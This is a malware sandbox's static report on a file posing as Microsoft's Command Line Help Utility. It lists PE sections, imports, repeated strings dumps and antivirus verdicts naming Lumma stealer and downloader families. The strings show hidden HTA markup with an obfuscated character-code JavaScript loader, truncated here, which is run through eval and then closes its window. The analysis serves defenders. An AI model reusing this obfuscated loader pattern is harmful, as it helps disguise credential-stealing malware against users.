Static | ZeroBOX

PE Compile Time

2037-02-01 12:28:24

PDB Path

help.pdb

PE Imphash

611805a7c3221ebb521e87bf9182d982

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00001144 0x00001200 5.62249695483
.data 0x00003000 0x000003c0 0x00000200 0.183338791656
.idata 0x00004000 0x000004a6 0x00000600 4.22064067648
.rsrc 0x00005000 0x000007f0 0x00000800 4.34072862774
.reloc 0x00006000 0x00000178 0x00000200 5.12581075319

Resources

Name Offset Size Language Sub-language File type
MUI 0x00005728 0x000000c8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_VERSION 0x00005398 0x00000390 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x000050f0 0x000002a7 LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document, ASCII text, with CRLF line terminators

Imports

Library KERNEL32.dll:
0x404000 GetConsoleOutputCP
0x404004 GetStdHandle
0x404008 WriteFile
0x40400c SetThreadUILanguage
0x404010 GetConsoleMode
0x404014 FormatMessageW
0x404018 HeapSetInformation
0x40401c WriteConsoleW
0x404020 LocalFree
0x404024 WideCharToMultiByte
0x404028 GetFileType
0x40402c GetCurrentProcess
0x404034 GetTickCount
0x40403c GetCurrentThreadId
0x404040 GetCurrentProcessId
0x404048 GetModuleHandleW
0x404050 Sleep
0x404054 TerminateProcess
Library msvcrt.dll:
0x40405c __wgetmainargs
0x404060 __set_app_type
0x404064 __p__commode
0x404068 _exit
0x40406c _cexit
0x404070 __p__fmode
0x404074 __setusermatherr
0x404078 _initterm
0x40407c ?terminate@@YAXXZ
0x404080 _controlfp
0x404088 _amsg_exit
0x40408c _XcptFilter
0x404090 malloc
0x404094 _wcsnicmp
0x404098 free
0x40409c _wsystem
0x4040a0 wcscat_s
0x4040a4 wcscpy_s
0x4040a8 _ultow
0x4040ac setlocale
0x4040b0 exit

!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
<HTA:APPLICATION CAPTION = "no" WINDOWSTATE = "minimize" SHOWINTASKBAR = "no" >MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
<script>
// Lookup table for the obfuscation layer: each two-letter global assigned below
// holds one decimal character code (for example MJ=102 is 'f' and qT=32 is a space).
// The statement that follows passes these names to String.fromCharCode to build
// the string vOt, so the script text never appears in readable form in the file.
// NOTE(review): the vOt statement is cut off in this strings dump, so the full
// decoded text cannot be recovered from this page alone; use the original sample
// or the behavioural report for the complete content.
MJ=102;Gg=117;Ak=110;tA=99;GA=116;ON=105;Hv=111;qT=32;Vz=97;IA=71;ik=87;Ax=40;zz=66;cC=119;ge=68;aw=41;Xr=123;OG=118;CN=114;zi=100;gY=120;GR=61;zT=34;AF=59;SV=72;iS=81;Bc=48;JI=60;gB=46;Hq=108;Uc=101;aS=103;pQ=104;gj=43;QI=65;za=112;UJ=83;ej=109;yg=67;yX=91;kK=93;dp=45;OF=52;qm=50;xu=125;gy=49;ap=53;Ed=44;rh=51;dk=54;Yi=55;Fs=56;kI=57;xr=122;xZ=88;Kz=79;Ck=98;GJ=106;zk=82;
var vOt = String.fromCharCode(MJ,Gg,Ak,tA,GA,ON,Hv,Ak,qT,Vz,IA,ik,Ax,zz,cC,ge,aw,Xr,OG,Vz,CN,qT,IA,zi,gY,GR,qT,zT,zT,AF,MJ,Hv,CN,qT,Ax,OG,Vz,CN,qT,SV,IA,iS,qT,GR,qT,Bc,AF,qT,SV,IA,iS,qT,JI,qT,zz,cC,ge,gB,Hq,Uc,Ak,aS,GA,pQ,AF,qT,SV,IA,iS,gj,gj,aw,qT,Xr,OG,Vz,CN,qT,pQ,QI,za,qT,GR,qT,UJ,GA,CN,ON,Ak,aS,gB,MJ,CN,Hv,ej,yg,pQ,Vz,CN,yg,Hv,zi,Uc,Ax,zz,cC,ge,yX,SV,IA,iS,kK,qT,dp,qT,OF,qm,aw,AF,IA,zi,gY,qT,GR,qT,IA,zi,gY,qT,gj,qT,pQ,QI,za,xu,CN,Uc,GA,Gg,CN,Ak,qT,IA,zi,gY,xu,AF,OG,Vz,CN,qT,OG,QI,Uc,qT,GR,qT,Vz,IA,ik,Ax,yX,gy,ap,OF,Ed,gy,ap,rh,Ed,gy,dk,gy,Ed,gy,OF,rh,Ed,gy,ap,dk,Ed,gy,ap,Yi,Ed,gy,OF,dk,Ed,gy,OF,rh,Ed,gy,ap,Bc,Ed,gy,ap,Bc,Ed,Fs,Fs,Ed,gy,OF,rh,Ed,gy,dk,qm,Ed,gy,OF,rh,Ed,Yi,OF,Ed,Fs,Yi,Ed,gy,dk,gy,Ed,Yi,OF,Ed,gy,OF,dk,Ed,Yi,OF,Ed,Fs,Yi,Ed,gy,ap,qm,Ed,gy,ap,rh,Ed,gy,ap,OF,Ed,Yi,OF,Ed,Fs,Yi,Ed,gy,OF,rh,Ed,gy,ap,OF,Ed,Yi,OF,Ed,gy,ap,kI,Ed,gy,ap,qm,Ed,Yi,OF,Ed,Fs,Yi,Ed,gy,gy,gy,Ed,Yi,OF,Ed,gy,gy,dk,Ed,gy,Bc,Yi,Ed,gy,Bc,Fs,Ed,gy,gy,rh,Ed,gy,Bc,Yi,Ed,gy,gy,gy,Ed,gy,gy,kI,Ed,gy,Bc,Yi,Ed,gy,rh,kI,Ed,gy,OF,ap,Ed,gy,B
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
<script>
// Executes the string held in vOt as script code. vOt is assembled in an earlier
// script block from character codes, so what runs here is only visible after
// that string has been decoded.
// NOTE(review): the script blocks sit between repeated copies of the PE strings,
// which suggests HTA markup embedded inside the executable image and read by an
// HTA host rather than by the PE loader - confirm against the behavioural report.
eval(vOt)
// Closes the HTA window after eval returns. Combined with the HTA:APPLICATION
// attributes seen earlier (WINDOWSTATE "minimize", SHOWINTASKBAR "no", CAPTION "no")
// this keeps the window out of the user's view.
window.close();
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Cylance Unsafe
Zillya Clean
Sangfor Trojan.Win32.Agent.Vrqp
CrowdStrike win/malicious_confidence_60% (D)
Alibaba Trojan:Script/Lumma.8cdf307a
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 Clean
APEX Clean
Avast Win32:Lumma-E [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Troj/DwnLd-ARJ
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfeeD ti!3DCA1CA41315
Trapmine Clean
CTX Clean
Emsisoft Clean
Ikarus Win32.Outbreak
GData Clean
Jiangmin Clean
Webroot Clean
Varist Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Troj/DwnLd-ARJ
Microsoft Trojan:Win32/LummaStealer!rfn
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Artemis!060068E1F94B
TACHYON Clean
VBA32 Clean
Malwarebytes Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.Generic!8.C3 (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet W32/Agent.PWSL!tr
AVG Win32:Lumma-E [Drp]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.